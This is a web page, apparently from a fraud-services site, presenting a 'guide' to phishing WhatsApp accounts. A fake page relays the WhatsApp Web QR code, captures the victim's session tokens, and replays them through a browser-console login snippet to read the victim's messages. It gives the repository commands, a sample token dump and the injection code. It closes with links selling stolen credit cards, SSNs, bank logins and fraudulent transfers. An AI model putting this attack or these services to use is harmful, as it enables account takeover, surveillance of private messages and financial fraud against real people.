You are currently viewing PHISHING ON WHATSAPP USING QR CODE – 2022 UPDATED GUIDE

PHISHING ON WHATSAPP USING QR CODE – 2022 UPDATED GUIDE

Some time back we had composed an article concerning how to join and confirm global numbers on WhatsApp, today anyway you will gain some significant knowledge about WhatsApp phishing using only its own QR code.

Before the finish of this 2022 article, you will actually want to remove the QR code from Whatsapp Web and show it on another page.

At the point when your target will scan the QR code using Whatsapp, it will get the accreditations from the web client and save them in a file. You can then involve that file to log yourself in as your target who scanned the QR code and check their messages, history what’s significantly cooler in the way that each time they will get a message you will get that message as well, isn’t so cool?

PHISHING ON WHATSAPP USING QR CODE
PHISHING ON WHATSAPP USING QR CODE

 

HOW IT WORKS

This will use node.js and socket.io for the site and selenium, an instrument for scripting browsers, to communicate with the Whatsapp web client, it sounds overwhelming and excessively complicated to people who are curious about programming but rather we can guarantee you that we will make it simple as breathing.

The program begins with an HTTP and a socket.io server. Assuming that another client connects with socket.io the application will make a request to a selenium instance to begin another program and associate with web.whatsapp.com. It will bring the QR code information and send it to the client through the WebSocket connection. The client javascript then shows the QR code to the client.

WhatsApp QR code

Assuming that the QR code gets examined Whatsapp will confirm the selenium-controlled program and store a few tokens in the localStorage and document cookie. We extricate that information and save it into a text document. It will resemble the code underneath:

CODE

{

“s”:{

“remember-me”:”true”,

“qwefsdafadsdf==”:”false”,

“debugCursor”:”146″,

“WAWamDimensionCache”:”{\”AppVersion\”:\”0.1.4391\”,\”BrowserVersion\”:\”Firefox 39.0\”,\”DeviceName\”:\”Linux x86_64\”,\”WebcEnv\”:0}”,

“WAToken2″:”\”0.asldkamäsdflkasdfasdf\””,

“WAWamLastRotate”:”1439140177924″,

“WALangPref”:”\”de-DE\””,

“WAWamStatus”:”\”completed\””,

“y8fY/zQ8P+asdfadfg==”:”[

“WAToken1″:”\”asdf+ams,dfhlaskdjfhasdfasdf=\””,

“Dexie.DatabaseNames”:”[\”wawc\”]”,

“storage_test”:”storage_test”,

“LKAJsdlksdjfasdf==”:”false”,

“whatsapp-mutex”:”\”x781239870495:init0.987123490234\””,

“WASecretBundle”:”{\”key\”:\”sldkfjsdf+asdlfijlasdkjfasdf=\”,\”encKey\”:\”asldkfjasldkfjsdfsdf0=\”,\”macKey\”:\”a,sdfasdf+alskdjföalskdhiopasdf=\”}”,

“WABrowserId”:”\”aö,ksdjflöasdf==\””

},

“c”:””

You can then import these tokens into your browser and log in as the person who scanned the QR code, still confused?

Just follow along and you will be amazed at how simple it actually is.

PHISHING ON WHATSAPP USING QR CODE
PHISHING ON WHATSAPP USING QR CODE

DIRECTIONS

Download the selenium standalone server jar file and install Firefox if you don’t already have it.

Type the following into your terminal

CODE

$ java -jar selenium-server.jar

$ # new terminal

$ git clone https://github.com/Mawalu/whatsapp-phishing.git

$ cd whatsapp-phishing

$ npm install

$ node index.js

  • Once you have done that, follow the steps along:
  • Open your browser and go to http://localhost:8080
  • Start Whatsapp on your smartphone, go to Menu > Whatsapp Web and scan the QR code from your browser.
  • Copy the content from the newly created secrets file
  • Open web.whatsapp.com. (Watch out that you are not already logged in, maybe use incognito mode)
  • Open your developer console

In that developer console you will copy/paste the following code:

CODE

var t = CONTENT_OF_YOUR_SECRETS_FILE

> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}

> login(t)

Great job! Now you will reload the page and surprise surprise! You should now be logged in as the person who scanned the QR code.

Was it that difficult? Things are easy when you know how to do them. Congrats today you have learned yet another amazing guide to keep in your knowledge arsenal.

GOOD LUCK!!!

 

With that said, If you would like to invest in your knowledge by learning from one of the best in the game you can hit the link to Get Access to our One-on-One Private Class

 

MERITS:

CLICK TO BUY CC WITH THE LINK BELOW:

https://metabanklogs.com/product-category/cvv-cards/

CLICK TO BUY SSN WITH THE LINK BELOW:

https://metabanklogs.com/product-category/ssn-fullz/

CLICK TO BUY LIVE MENTORSHIP/TUTORIALS WITH THE LINK BELOW:

https://metabanklogs.com/product-category/tutorials-mentorship/

CLICK TO BUY INSTANT CASHAPP TRANSFER WITH THE LINK BELOW:

https://metabanklogs.com/product-category/cashapp-transfer/

CLICK TO BUY INSTANT PAYPAL TRANSFER WITH THE LINK BELOW:

https://metabanklogs.com/product-category/paypal-transfer/

CLICK TO BUY INSTANT WESTERN UNION TRANSFER WITH THE LINK BELOW:

https://metabanklogs.com/product-category/western-union/

CLICK TO BUY BANKLOGINS WITH THE LINK BELOW:

https://metabanklogs.com/product-category/bank-logins/

 

If this Post has helped you positively feel free to make a free will donation. Scan the Bitcoin QR code or Copy these address 1FgedSS2NciHPK3zTu1cd9haVUfC3C4FRx to send freewill donations.

 

 

 

Leave a Reply